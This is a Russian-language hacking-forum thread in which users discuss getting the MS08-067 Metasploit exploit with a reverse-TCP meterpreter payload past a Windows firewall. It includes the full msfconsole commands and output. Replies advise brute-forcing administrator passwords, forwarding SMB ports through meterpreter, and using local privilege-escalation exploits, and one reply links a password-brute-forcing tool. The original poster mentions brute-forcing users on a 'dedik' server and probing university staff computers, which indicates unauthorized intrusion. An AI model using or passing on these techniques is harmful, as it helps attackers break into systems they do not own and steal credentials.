Просмотр полной версии : ms08-67 при включенном фаерволе.
roman921
06.02.2017, 18:41
Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > exploit
Started reverse TCP handler on 192.168.0.1:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). Exploit completed, but no session was created.
Можно ли как-то обойти это при включенном фаерволе ?
Какой бы еще попробовать эксплойт.
Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят.
blackbox
06.02.2017, 19:23
roman921 said:
↑ (https://antichat.live/posts/4045708/)
Тестирую этот эксплоит на чистой win xp sp2. Вот если фаер отключен, то все работает, а когда включаю, то коннекттаймаут.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > exploit
Started reverse TCP handler on 192.168.0.1:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). Exploit completed, but no session was created.
Можно ли как-то обойти это при включенном фаерволе ?
Какой бы еще попробовать эксплойт.
Пробовал через armitage в кали, там автоматический пробивал через ms08-67 систему, но с включенным фаером ни один сплойт, из тех, что armitage подбирает, не проходят.
Так и не будет работать, если целевой порт сервиса закрыт фаерволом.
roman921
06.02.2017, 19:35
blackbox said:
↑ (https://antichat.live/posts/4045717/)
Так и не будет работать, если целевой порт сервиса закрыт фаерволом.
А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу. Но что-то типа multi handler применить если, так не прокатит ?
Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что
Automatically detecting the target... Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown Could not determine the exact language pack Exploit completed, but no session was created.
Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ?
blackbox
06.02.2017, 19:43
roman921 said:
↑ (https://antichat.live/posts/4045725/)
А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу. Но что-то типа multi handler применить если, так не прокатит ?
Еще заодно вопрос про windows server 2003 r2 sp2, поставил такой на виртуалку, 445 порт открыт, но сплойт выдает, что
Automatically detecting the target... Fingerprint: Windows 2003 Service Pack 2 - lang:Unknown Could not determine the exact language pack Exploit completed, but no session was created.
Правильно, что все r2 серваки этой атаке не подвержены ? Просто в списке уязвимых машин есть Windows 2003 SP2 English (NX) списки такого вида, но r2 нету в том списке, или тут sp2 если уязвима, то r2 тоже ?
Можно в фаерволе добавить правило, которое к нужному порту разрешит доступ. Я давно метасплойт не юзал, но в последнем случае скорее всего версия ОС на машине просто не подвержена уязвимости.
roman921
06.02.2017, 19:48
blackbox said:
↑ (https://antichat.live/posts/4045734/)
Можно в фаерволе добавить правило
Без прав админа вроде нельзя ?
blackbox
06.02.2017, 20:12
roman921 said:
↑ (https://antichat.live/posts/4045737/)
Без прав админа вроде нельзя ?
Нельзя
roman921
07.02.2017, 01:16
А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис.
Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды.
Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.*
Вот нашел их на гитхаб, https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local
У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать.
blackbox
07.02.2017, 12:51
roman921 said:
↑ (https://antichat.live/posts/4046018/)
А каким бы компилятором можно под винду перекомпилить исходники локальных эксплойтов, хочу пересобрать эксплойты локальные для повышения прав. (который отсюда exploit\local\windows)Но если брать visual studio, то она найдет кучу ошибок и придется каждый править, подскажите компилятор, который переваривает нормально этот синтаксис.
Идея в том, чтобы не возиться с multi handler, а сразу запускать их из винды.
Кстати с multi handler тоже есть проблемы, в локалке все норм, а во внешней сети облом из-за того что нет прямого ип, а только серый вида 192.168.*.*
Вот нашел их на гитхаб,
https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/local
У них синатксис не совсем сишный, поэтому конвертер хотя бы для них найти, чтобы в си, а потом наверно gcc можно компиль использовать.
Эти эксплойты на руби написаны, и они идут как часть msf а не самостоятельные программы. Вообще такого рода вопросы можно на форуме метасплойта и задавать.
binarymaster
07.02.2017, 16:41
roman921 said:
↑ (https://antichat.live/posts/4045725/)
А можно как-то обойти это при условии что есть рдп доступ к машине юзерского аккуанта, то есть фаер отключить не смогу.
Если есть юзерский аккаунт, можно с него попробовать пробрутить админский.
roman921 said:
↑ (https://antichat.live/posts/4045737/)
Без прав админа вроде нельзя ?
Если брут не прокатит, ещё можно от юзера по реверсу пробросить 139/tcp и 445/tcp порты, куда-то. И msf-ом атаковать уже проброшенные порты.
Дальше вопрос только в том, чтобы начинка дала бэк-коннект на правильный IP и порт.
roman921
07.02.2017, 23:41
binarymaster said:
↑ (https://antichat.live/posts/4046211/)
Если есть юзерский аккаунт, можно с него попробовать пробрутить админский.
Обычно через nt-passworder ставлю на 5-7 цифр бруты, на одном дедике у многих юзеров оказались пассы 4,5 цифр, а админы не поддались. Интересно почему так, юзеры у админов просят простые им пассы ставить ? А сами админы себе видать сложное ставят.
binarymaster said:
↑ (https://antichat.live/posts/4046211/)
ещё можно от юзера по реверсу пробросить 139/tcp и 445/tcp порты, куда-то.
Ну вот такая идея как раз о пробросе я и думал, но это я так понимаю нужно в роутер попасть.
Кстати на 2008 и 7 прокатывали локальные эксплойты kitapr0d, ms16-032, potato, flatenrec, taihou64 это вот то что вспомнил, вроде еще какие-то пробовал.
А на 2003 чет не получается, которые с r2 sp2.
Может кто делал подборку эксплойтов собранных для повышения прав, заметил, что в exploit-db эти эксплойты часто надо доправлять по мелким ошибкам, к примеру, многие там почему-то забывают выделять память указателям структур)
binarymaster
07.02.2017, 23:47
roman921 said:
↑ (https://antichat.live/posts/4046386/)
Обычно через nt-passworder ставлю на 5-7 цифр бруты, на одном дедике у многих юзеров оказались пассы 4,5 цифр, а админы не поддались. Интересно почему так, юзеры у админов просят простые им пассы ставить ? А сами админы себе видать сложное ставят.
Лучше брутить словарём, цифровые пароли на Windows юзеры ставят реже.
roman921 said:
↑ (https://antichat.live/posts/4046386/)
Ну вот такая идея как раз о пробросе я и думал, но это я так понимаю нужно в роутер попасть.
Нет, речь идёт о реверс-соединении к портам, используя различные реверсеры, либо встроенную возможность начинки meterpreter (там есть команда portfwd, начинка входит в состав msf).
roman921 said:
↑ (https://antichat.live/posts/4046386/)
Кстати на 2008 и 7 прокатывали локальные эксплойты kitapr0d, ms16-032, potato, flatenrec, taihou64 это вот то что вспомнил, вроде еще какие-то пробовал.
Хороший выбор. KiTrap0D на NT 5.1 и 5.2 срабатывает практически всегда.
roman921
08.02.2017, 00:20
binarymaster said:
↑ (https://antichat.live/posts/4046390/)
Лучше брутить словарём
Проблема в том что nt passworder не поддерживает словари, какую бы взять прогу, где словари можно было бы. Чтобы также из под юзера можно было бы поставить брут.
binarymaster said:
↑ (https://antichat.live/posts/4046390/)
речь идёт о реверс-соединении к портам
Еще вспомнил про multi handler, из-за серого ипишника 192.168 как бы настроить его.
binarymaster
08.02.2017, 00:30
roman921 said:
↑ (https://antichat.live/posts/4046397/)
Проблема в том что nt passworder не поддерживает словари, какую бы взять прогу, где словари можно было бы. Чтобы также из под юзера можно было бы поставить брут.
Попробуйте это:
http://rgho.st/6CHz9D4tb
Одна из моих старых частично заброшенных разработок.
roman921 said:
↑ (https://antichat.live/posts/4046397/)
Еще вспомнил про multi handler, из-за серого ипишника 192.168 как бы настроить его.
Если память не подводит, эту начинку ещё не испытывал.
roman921
08.02.2017, 00:39
binarymaster said:
↑ (https://antichat.live/posts/4046399/)
Если память не подводит, эту начинку ещё не испытывал.
Это когда есть доступ к машине, то генерируешь бэкдор в метасплойт и его там запускаешь, он открывает сессию для метасплойта. А дальше можно вызывать локальные эксплойты из метасплойта, но из-за серого ip походу проще перекомпилить их в экзешники и притащить туда.
Тут еще про удаленные компы, вот заметил в универе класс компов, туда в учетки преподы заходят по логину-пассу корпоративной почты.
Но в lusrmgr.msc их логинов нету, а папки в users их есть, винда 7, вот как их так спрятали интересно. В net user их тоже нету. А dsa.msc не открылась на тех компах, думал доменные юзеры.
binarymaster
08.02.2017, 00:43
roman921 said:
↑ (https://antichat.live/posts/4046402/)
проще перекомпилить их в экзешники
Не проще. Потому что эксплойты msf для этого просто не предназначены, они зависят от множества внутренних интерфейсов, предоставляемых фреймворком.
Реальный вариант - искать C/C+ исходники этих же эксплойтов, либо уже скомпилированные программы.
roman921
08.02.2017, 00:44
binarymaster said:
↑ (https://antichat.live/posts/4046406/)
отому что эксплойты msf для этого просто не предназначены
Я имел ввиду взять их исходники не из метасплойта, а из базы exploit-db, там с++ код у большинства.
binarymaster
08.02.2017, 00:45
А, это другое дело.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot